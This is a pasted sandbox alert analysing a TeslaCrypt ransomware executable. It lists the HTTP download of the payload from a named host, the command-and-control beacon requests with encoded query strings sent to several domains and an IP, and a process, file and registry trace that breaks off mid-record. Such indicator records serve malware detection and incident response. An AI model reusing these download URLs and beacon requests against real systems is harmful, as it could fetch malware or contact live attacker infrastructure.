Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- alerts:
- msg: normal
- product: CMS
- version: 7.6.3.426975
- appliance: SERVER
- appliance-id: 00:25:90:XX:XX:XX
- alert (id:134, name:malware-object):
- product: Web MPS
- appliance-id: 0C:C4:7A:XX:XX:XX
- severity: majr
- version: 7.6.2.426875
- sensor: SERVER
- explanation:
- protocol: tcp
- analysis: binary
- malware-detected:
- malware (name:Trojan.Ransomware.MVX):
- malware (name:Trojan.TeslaCrypt):
- type: exe
- stype: vm-bot-command
- sid: 86108811;86108812
- downloaded-at: 2015-12-04T11:41:04Z
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- original: 73.exe
- http-header: GET /beta/js/73.exe?0 HTTP/1.1
- User-Agent: Wget/1.17-dirty (mingw32)
- Accept: */*
- Accept-Encoding: identity
- Host: auctorit.com
- Connection: Keep-Alive
- HTTP/1.1 200 OK
- Date: Fri, 04 Dec 2015 11:40:51 GMT
- Server: Apache
- Last-Modified: Fri, 04 Dec 2015 11:22:10 GMT
- ETag: "59000-52610b7f010f3"
- Accept-Ranges: bytes
- Content-Length: 364544
- Keep-Alive: timeout=5, max=100
- Connection: Keep-Alive
- Content-Type: application/x-msdownload
- executed-at: 2015-12-04T20:49:23Z
- application: Windows Explorer
- cnc-services:
- cnc-service:
- protocol: tcp
- port: 80
- address: woodenden.com
- channel: GET /sysmisc.php?6D7D9F37631FC985823AE3D6A11B76975E1E6FD99B33B6A4E6449FC4ECEFB6389A70B544F14CF9CE8A41530B7494F84E81EA5965CA5805B89C7B5FE49AE87475207AE85070E1FD0627558DFC66524B2E239AD451633393B4E9EE499FC9BF4EB5126B7B70F1511843BBE94A46033DF406CEBB4805C9BB8BB0B2CBE8ED6AAC1232912CAB09525A00F545F1C01DE2D717E08C5205A093837CAFC49F90EC2C1F31664F167C190D2FA58A28E08777AE5FC037398C8B58D38598B0F7FB6179B6D0786DB48131F4BD5E8397B678BBFAA9F2798A20B75270C7A404AB3F1C3923107D9E8736CC0511780137F0821CACEDB81040DD28C799FF5A6D218AA726AF946F02D1E23B9FCAE6A23482B271395A535DAFADCE74FDE55C20A24E3348D0A84984871DEC8C1F04548850EF19C3EB9D643E09CC58931D23D4D7043ED1E0E5F59FA4F086A6869ABC83F805F0257360B1F8886541C7 HTTP/1.1::~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko::~~Host: woodenden.com::~~Connection: Keep-Alive::~~::~~
- cnc-service:
- protocol: tcp
- port: 80
- address: 199.16.199.3
- channel: GET /misc.php?186DA62846D1FD7D416074C75C7A1C2C9E64DB6CC989D8BC9DF3DC65347E1E610313A77E1347F0BF42734750B920EF8AB676CAF2D9CE88881E95357E9DE3F6D86F2278BCF9EEEBF371BDEC7A2F72B0BCA080F7E8B708721D49EDF5F1830BBF87DD78F5EF07F20C55E8E68258A9E850EA601A831DF04CC01B8AB0B2245C9C56928921D7C6775FCEFB1759AEC10BFCE8258667569EA3F4F04DCAE2516B0900E2C3740422AF6DD581F0D07FD7295CC9D1FB723BF0A110D963882A73BCA90F59ABA71BD84C40D0EB18A5E9685DA857967039161FC96D5EA7235693E8207797DF481C540EC5CDBB3FCE80537B879E565B2B5DC12A5940B3EC6395032A3F02822DA1720404838BC9FCECF92815F83D31AC1B099BB21B8215818571DF0775474018F3A9F63EFB72FCDF5217D1E6D96F06E15D4E672C629E192C07D7C8F9BA6843020F2958FEAED748005792AABDF31037C8C08E HTTP/1.1::~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko::~~Host: irseek.com::~~Connection: Keep-Alive::~~::~~
- cnc-service:
- protocol: tcp
- port: 80
- address: irseek.com
- channel: GET /misc.php?6D7D9F37631FC985823AE3D6A11B76975E1E6FD99B33B6A4E6449FC4ECEFB6389A70B544F14CF9CE8A41530B7494F84E81EA5965CA5805B89C7B5FE49AE87475207AE85070E1FD0627558DFC66524B2E239AD451633393B4E9EE499FC9BF4EB5126B7B70F1511843BBE94A46033DF406CEBB4805C9BB8BB0B2CBE8ED6AAC1232912CAB09525A00F545F1C01DE2D717E08C5205A093837CAFC49F90EC2C1F31664F167C190D2FA58A28E08777AE5FC037398C8B58D38598B0F7FB6179B6D0786DB48131F4BD5E8397B678BBFAA9F2798A20B75270C7A404AB3F1C3923107D9E8736CC0511780137F0821CACEDB81040DD28C799FF5A6D218AA726AF946F02D1E23B9FCAE6A23482B271395A535DAFADCE74FDE55C20A24E3348D0A84984871DEC09AE11171D2F672F40C560F36F251C4015E5604621CA6367B230F384C0D01624734323BC0C8A112F345735164448A812 HTTP/1.1::~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko::~~Host: irseek.com::~~Connection: Keep-Alive::~~::~~
- cnc-service:
- protocol: tcp
- port: 80
- address: woodenden.com
- channel: GET /sysmisc.php?186DA62846D1FD7D416074C75C7A1C2C9E64DB6CC989D8BC9DF3DC65347E1E610313A77E1347F0BF42734750B920EF8AB676CAF2D9CE88881E95357E9DE3F6D86F2278BCF9EEEBF371BDEC7A2F72B0BCA080F7E8B708721D49EDF5F1830BBF87DD78F5EF07F20C55E8E68258A9E850EA601A831DF04CC01B8AB0B2245C9C56928921D7C6775FCEFB1759AEC10BFCE8258667569EA3F4F04DCAE2516B0900E2C3740422AF6DD581F0D07FD7295CC9D1FB723BF0A110D963882A73BCA90F59ABA71BD84C40D0EB18A5E9685DA857967039161FC96D5EA7235693E8207797DF481C540EC5CDBB3FCE80537B879E565B2B5DC12A5940B3EC6395032A3F02822DA1720404838BC9FCECF92815F83D31AC1B099BB21B8215818571DF0775474018F3A9528C52B38F260918A3043BBE6A78811A28D74C1407EE7F027502EBD14479D358D4046B9C1FD8982B78055D7999C8B76C HTTP/1.1::~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko::~~Host: woodenden.com::~~Connection: Keep-Alive::~~::~~
- cnc-service:
- protocol: tcp
- port: 80
- address: myexternalip.com
- channel: GET /raw HTTP/1.1::~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko::~~Host: myexternalip.com::~~::~~
- cnc-service:
- protocol: tcp
- port: 80
- address: aprenderabailarsevillanas.com
- channel: GET /wp-content/uploads/misc.php?6D7D9F37631FC985823AE3D6A11B76975E1E6FD99B33B6A4E6449FC4ECEFB6389A70B544F14CF9CE8A41530B7494F84E81EA5965CA5805B89C7B5FE49AE87475207AE85070E1FD0627558DFC66524B2E239AD451633393B4E9EE499FC9BF4EB5126B7B70F1511843BBE94A46033DF406CEBB4805C9BB8BB0B2CBE8ED6AAC1232912CAB09525A00F545F1C01DE2D717E08C5205A093837CAFC49F90EC2C1F31664F167C190D2FA58A28E08777AE5FC037398C8B58D38598B0F7FB6179B6D0786DB48131F4BD5E8397B678BBFAA9F2798A20B75270C7A404AB3F1C3923107D9E8736CC0511780137F0821CACEDB81040DD28C799FF5A6D218AA726AF946F02D1E23B9FCAE6A23482B271395A535DAFADCE74FDE55C20A24E3348D0A84984871DEC581871DC2741952E277C0C5C394EA73D62FFDF06CAA95F626F02DD304DE50A8B24A5036A0F943613122485EC8199077B32C438EEC4196B005AED3B2E21F64BA5 HTTP/1.1::~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko::~~Host: aprenderabailarsevillanas.com::~~Connection: Keep-Alive::~~::~~
- cnc-service:
- protocol: tcp
- port: 80
- address: 199.16.199.3
- channel: GET /misc.php?6D7D9F37631FC985823AE3D6A11B76975E1E6FD99B33B6A4E6449FC4ECEFB6389A70B544F14CF9CE8A41530B7494F84E81EA5965CA5805B89C7B5FE49AE87475207AE85070E1FD0627558DFC66524B2E239AD451633393B4E9EE499FC9BF4EB5126B7B70F1511843BBE94A46033DF406CEBB4805C9BB8BB0B2CBE8ED6AAC1232912CAB09525A00F545F1C01DE2D717E08C5205A093837CAFC49F90EC2C1F31664F167C190D2FA58A28E08777AE5FC037398C8B58D38598B0F7FB6179B6D0786DB48131F4BD5E8397B678BBFAA9F2798A20B75270C7A404AB3F1C3923107D9E8736CC0511780137F0821CACEDB81040DD28C799FF5A6D218AA726AF946F02D1E23B9FCAE6A23482B271395A535DAFADCE74FDE55C20A24E3348D0A84984871DEC09AE11171D2F672F40C560F36F251C4015E5604621CA6367B230F384C0D01624734323BC0C8A112F345735164448A812 HTTP/1.1::~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko::~~Host: irseek.com::~~Connection: Keep-Alive::~~::~~
- cnc-service:
- protocol: tcp
- port: 80
- address: djepola.com
- channel: GET /misc.php?186DA62846D1FD7D416074C75C7A1C2C9E64DB6CC989D8BC9DF3DC65347E1E610313A77E1347F0BF42734750B920EF8AB676CAF2D9CE88881E95357E9DE3F6D86F2278BCF9EEEBF371BDEC7A2F72B0BCA080F7E8B708721D49EDF5F1830BBF87DD78F5EF07F20C55E8E68258A9E850EA601A831DF04CC01B8AB0B2245C9C56928921D7C6775FCEFB1759AEC10BFCE8258667569EA3F4F04DCAE2516B0900E2C3740422AF6DD581F0D07FD7295CC9D1FB723BF0A110D963882A73BCA90F59ABA71BD84C40D0EB18A5E9685DA857967039161FC96D5EA7235693E8207797DF481C540EC5CDBB3FCE80537B879E565B2B5DC12A5940B3EC6395032A3F02822DA1720404838BC9FCECF92815F83D31AC1B099BB21B8215818571DF0775474018F3A94E701C59E26AE09F9C25C4F5BA58B92BC0B439D0F7FE1305A29727C6F5471D962F04B11DA7BFE934C06A95F08161E52D HTTP/1.1::~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko::~~Host: djepola.com::~~Connection: Keep-Alive::~~::~~
- cnc-service:
- protocol: tcp
- port: 80
- address: djepola.com
- channel: GET /misc.php?6D7D9F37631FC985823AE3D6A11B76975E1E6FD99B33B6A4E6449FC4ECEFB6389A70B544F14CF9CE8A41530B7494F84E81EA5965CA5805B89C7B5FE49AE87475207AE85070E1FD0627558DFC66524B2E239AD451633393B4E9EE499FC9BF4EB5126B7B70F1511843BBE94A46033DF406CEBB4805C9BB8BB0B2CBE8ED6AAC1232912CAB09525A00F545F1C01DE2D717E08C5205A093837CAFC49F90EC2C1F31664F167C190D2FA58A28E08777AE5FC037398C8B58D38598B0F7FB6179B6D0786DB48131F4BD5E8397B678BBFAA9F2798A20B75270C7A404AB3F1C3923107D9E8736CC0511780137F0821CACEDB81040DD28C799FF5A6D218AA726AF946F02D1E23B9FCAE6A23482B271395A535DAFADCE74FDE55C20A24E3348D0A84984871DECCCDF4ACE08BDF5C7289F82EA3EB2B2634532A4222EE1D3499322BCAEB7C18FDFE52473350D84D471C408DB88DA2A6314 HTTP/1.1::~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko::~~Host: djepola.com::~~Connection: Keep-Alive::~~::~~
- cnc-service:
- protocol: tcp
- port: 80
- address: apotheke-stiepel.com
- channel: GET /tmp/misc.php?6D7D9F37631FC985823AE3D6A11B76975E1E6FD99B33B6A4E6449FC4ECEFB6389A70B544F14CF9CE8A41530B7494F84E81EA5965CA5805B89C7B5FE49AE87475207AE85070E1FD0627558DFC66524B2E239AD451633393B4E9EE499FC9BF4EB5126B7B70F1511843BBE94A46033DF406CEBB4805C9BB8BB0B2CBE8ED6AAC1232912CAB09525A00F545F1C01DE2D717E08C5205A093837CAFC49F90EC2C1F31664F167C190D2FA58A28E08777AE5FC037398C8B58D38598B0F7FB6179B6D0786DB48131F4BD5E8397B678BBFAA9F2798A20B75270C7A404AB3F1C3923107D9E8736CC0511780137F0821CACEDB81040DD28C799FF5A6D218AA726AF946F02D1E23B9FCAE6A23482B271395A535DAFADCE74FDE55C20A24E3348D0A84984871DECED21659CCF7FD986FA06F839218E7B26671AEA59CDB3DD9E39D2FBB34FC011E1FE479B2804682BF57FEE5D1570CA74FAFCF9F145EF08CF920BFFF611B7A33C72 HTTP/1.1::~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko::~~Host: apotheke-stiepel.com::~~Connection: Keep-Alive::~~::~~
- cnc-service:
- protocol: tcp
- port: 80
- address: apotheke-stiepel.com
- channel: GET /tmp/misc.php?186DA62846D1FD7D416074C75C7A1C2C9E64DB6CC989D8BC9DF3DC65347E1E610313A77E1347F0BF42734750B920EF8AB676CAF2D9CE88881E95357E9DE3F6D86F2278BCF9EEEBF371BDEC7A2F72B0BCA080F7E8B708721D49EDF5F1830BBF87DD78F5EF07F20C55E8E68258A9E850EA601A831DF04CC01B8AB0B2245C9C56928921D7C6775FCEFB1759AEC10BFCE8258667569EA3F4F04DCAE2516B0900E2C3740422AF6DD581F0D07FD7295CC9D1FB723BF0A110D963882A73BCA90F59ABA71BD84C40D0EB18A5E9685DA857967039161FC96D5EA7235693E8207797DF481C540EC5CDBB3FCE80537B879E565B2B5DC12A5940B3EC6395032A3F02822DA1720404838BC9FCECF92815F83D31AC1B099BB21B8215818571DF0775474018F3A982909206FBB4E8B8DEE345079095D6FACB7D276F50256ABE4A878A2BE0B4BE80AB1296199D73873F2F3AB9240C58A0E884D7CBF6FEDF363779116AE3704406F5 HTTP/1.1::~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko::~~Host: apotheke-stiepel.com::~~Connection: Keep-Alive::~~::~~
- cnc-service:
- protocol: tcp
- port: 80
- address: aprenderabailarsevillanas.com
- channel: GET /wp-content/uploads/misc.php?186DA62846D1FD7D416074C75C7A1C2C9E64DB6CC989D8BC9DF3DC65347E1E610313A77E1347F0BF42734750B920EF8AB676CAF2D9CE88881E95357E9DE3F6D86F2278BCF9EEEBF371BDEC7A2F72B0BCA080F7E8B708721D49EDF5F1830BBF87DD78F5EF07F20C55E8E68258A9E850EA601A831DF04CC01B8AB0B2245C9C56928921D7C6775FCEFB1759AEC10BFCE8258667569EA3F4F04DCAE2516B0900E2C3740422AF6DD581F0D07FD7295CC9D1FB723BF0A110D963882A73BCA90F59ABA71BD84C40D0EB18A5E9685DA857967039161FC96D5EA7235693E8207797DF481C540EC5CDBB3FCE80537B879E565B2B5DC12A5940B3EC6395032A3F02822DA1720404838BC9FCECF92815F83D31AC1B099BB21B8215818571DF0775474018F3A9BE2ABD2CB94BBE711C82A3574DD576B5CF604106D55E6F2BFE1D5A4A8056AE25C6ACCEE5C75320955910B98551B937D3BEE23BB4859D46B0B74354C1D39161C4 HTTP/1.1::~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko::~~Host: aprenderabailarsevillanas.com::~~Connection: Keep-Alive::~~::~~
- cnc-service:
- protocol: tcp
- port: 80
- address: irseek.com
- channel: GET /misc.php?186DA62846D1FD7D416074C75C7A1C2C9E64DB6CC989D8BC9DF3DC65347E1E610313A77E1347F0BF42734750B920EF8AB676CAF2D9CE88881E95357E9DE3F6D86F2278BCF9EEEBF371BDEC7A2F72B0BCA080F7E8B708721D49EDF5F1830BBF87DD78F5EF07F20C55E8E68258A9E850EA601A831DF04CC01B8AB0B2245C9C56928921D7C6775FCEFB1759AEC10BFCE8258667569EA3F4F04DCAE2516B0900E2C3740422AF6DD581F0D07FD7295CC9D1FB723BF0A110D963882A73BCA90F59ABA71BD84C40D0EB18A5E9685DA857967039161FC96D5EA7235693E8207797DF481C540EC5CDBB3FCE80537B879E565B2B5DC12A5940B3EC6395032A3F02822DA1720404838BC9FCECF92815F83D31AC1B099BB21B8215818571DF0775474018F3A9F63EFB72FCDF5217D1E6D96F06E15D4E672C629E192C07D7C8F9BA6843020F2958FEAED748005792AABDF31037C8C08E HTTP/1.1::~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko::~~Host: irseek.com::~~Connection: Keep-Alive::~~::~~
- os-changes (id:97480):
- osinfo: Microsoft Windows7 64-bit 6.1 sp1 15.0826
- version: 1.1290
- analysis:
- sequenceNumber: 1
- product: MPS
- ftype: exe
- mode: malware
- version: 1.1290
- application:
- app-name: Windows Explorer
- sequenceNumber: 2
- os (name:windows):
- version: 6.1.7601
- arch: x64
- sequenceNumber: 3
- sp: 1
- os_monitor:
- date: Aug 13 2015
- version: 15R1
- build: 403692
- sequenceNumber: 4
- time: 17:02:35
- config-update:
- timestamp: 78
- sequenceNumber: 5
- status: success
- update-requested: false
- version: 1.01
- uac:
- timestamp: 7079
- mode: service
- sequenceNumber: 6
- value: Multimedia Class Scheduler
- status: running
- process:
- timestamp: 18878
- mode: started
- sequenceNumber: 7
- value: C:\Users\Administrator\AppData\Local\Temp\73.exe
- pid: 2312
- ppid: 1092
- parentname: C:\Windows\explorer.exe
- cmdline: "C:\Users\Administrator\AppData\Local\Temp\73.exe"
- filesize: 364544
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- sha1sum: 8d149bc90e10db7571379dc0e62409cdcfb7427c
- ads:
- fid (ads:): 3377699720611042
- file:
- timestamp: 20909
- mode: failed
- sequenceNumber: 8
- value: C:\Windows\System32\WOW64LOG.DLL
- processinfo:
- tainted: true
- pid: 2312
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- new-dialog-popup:
- timestamp: 21972
- sequenceNumber: 9
- processinfo:
- pid: 2312
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- hwnd: 0x000D02A0
- title: C:\Users\Administrator\AppData\Local\Temp\73.exe
- window-class: ConsoleWindowClass
- size-width: 677
- size-height: 342
- position-x: 75
- position-y: 75
- visible: true
- topmost: false
- text-fields:
- text-field (id:1): C:\Users\Administrator\AppData\Local\Temp\73.exe
- regkey:
- randomized: true
- mode: queryvalue
- sequenceNumber: 10
- timestamp: 22106
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
- processinfo:
- pid: 2312
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 23621
- mode: failed
- sequenceNumber: 11
- value: C:\Windows\ARU2YO48QPE
- processinfo:
- pid: 2312
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x60
- file:
- timestamp: 25213
- mode: failed
- sequenceNumber: 12
- value: C:\Windows\Fonts\FQ2SZNG21IEC5G4
- processinfo:
- pid: 2312
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 25309
- mode: failed
- sequenceNumber: 13
- value: C:\Users\Administrator\AppData\Local\Temp\FQ2SZNG21IEC5G4
- processinfo:
- pid: 2312
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 25313
- mode: failed
- sequenceNumber: 14
- value: C:\Users\ADMINI~1\AppData\Local\Temp\FQ2SznG21IEC5G4
- processinfo:
- pid: 2312
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 25357
- mode: failed
- sequenceNumber: 15
- value: C:\Windows\SysWOW64\FQ2SZNG21IEC5G4
- processinfo:
- pid: 2312
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 25361
- mode: failed
- sequenceNumber: 16
- value: C:\Windows\system\FQ2SZNG21IEC5G4
- processinfo:
- pid: 2312
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 25364
- mode: failed
- sequenceNumber: 17
- value: C:\Windows\FQ2SZNG21IEC5G4
- processinfo:
- pid: 2312
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 25372
- mode: failed
- sequenceNumber: 18
- value: C:\Windows\SysWOW64\wbem\FQ2SZNG21IEC5G4
- processinfo:
- pid: 2312
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 25375
- mode: failed
- sequenceNumber: 19
- value: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FQ2SZNG21IEC5G4
- processinfo:
- pid: 2312
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 25389
- mode: failed
- sequenceNumber: 20
- value: C:\Program Files (x86)\QuickTime\QTSystem\FQ2SZNG21IEC5G4
- processinfo:
- pid: 2312
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 25409
- mode: failed
- sequenceNumber: 21
- value: C:\Program Files (x86)\Debugging Tools for Windows (x86)\FQ2SZNG21IEC5G4
- processinfo:
- pid: 2312
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 25413
- mode: failed
- sequenceNumber: 22
- value: C:\Program Files\Debugging Tools for Windows (x64)\FQ2SZNG21IEC5G4
- processinfo:
- pid: 2312
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 27963
- mode: failed
- sequenceNumber: 23
- value: C:\Windows\Fonts\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 2312
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 27968
- mode: failed
- sequenceNumber: 24
- value: C:\Users\Administrator\AppData\Local\Temp\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 2312
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 27974
- mode: failed
- sequenceNumber: 25
- value: C:\Users\ADMINI~1\AppData\Local\Temp\R38QI00a0m0\D77273j5H4b
- processinfo:
- pid: 2312
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 27982
- mode: failed
- sequenceNumber: 26
- value: C:\Windows\SysWOW64\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 2312
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 27996
- mode: failed
- sequenceNumber: 27
- value: C:\Windows\system\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 2312
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 28000
- mode: failed
- sequenceNumber: 28
- value: C:\Windows\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 2312
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 28036
- mode: failed
- sequenceNumber: 29
- value: C:\Windows\SysWOW64\wbem\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 2312
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 28041
- mode: failed
- sequenceNumber: 30
- value: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 2312
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 28045
- mode: failed
- sequenceNumber: 31
- value: C:\Program Files (x86)\QuickTime\QTSystem\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 2312
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 28049
- mode: failed
- sequenceNumber: 32
- value: C:\Program Files (x86)\Debugging Tools for Windows (x86)\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 2312
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 28096
- mode: failed
- sequenceNumber: 33
- value: C:\Program Files\Debugging Tools for Windows (x64)\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 2312
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- apicall:
- timestamp: 28040
- sequenceNumber: 34
- processinfo:
- pid: 2312
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: user32.dll
- apiname: EnumWindows
- address: 0x002e0eba
- params:
- param (id:1): 0x2e0e20
- param (id:2): 0x18f5b8
- apicall:
- timestamp: 28044
- sequenceNumber: 35
- processinfo:
- pid: 2312
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x002e11cc
- params:
- param (id:1): 1100
- process:
- timestamp: 30046
- mode: started
- sequenceNumber: 36
- value: C:\Users\Administrator\AppData\Local\Temp\73.exe
- pid: 2540
- ppid: 2312
- parentname: C:\Users\Administrator\AppData\Local\Temp\73.exe
- cmdline: "C:\Users\Administrator\AppData\Local\Temp\73.exe"
- filesize: 364544
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- sha1sum: 8d149bc90e10db7571379dc0e62409cdcfb7427c
- ads:
- fid (ads:): 3377699720611042
- file:
- timestamp: 30262
- mode: failed
- sequenceNumber: 37
- value: C:\Windows\System32\WOW64LOG.DLL
- processinfo:
- tainted: true
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- process:
- timestamp: 30266
- mode: terminated
- sequenceNumber: 38
- value: C:\Users\Administrator\AppData\Local\Temp\73.exe
- pid: 2312
- ppid: 1092
- parentname: C:\Windows\explorer.exe
- cmdline: N/A
- ads:
- fid (ads:): 3377699720611042
- file:
- timestamp: 30271
- mode: failed
- sequenceNumber: 39
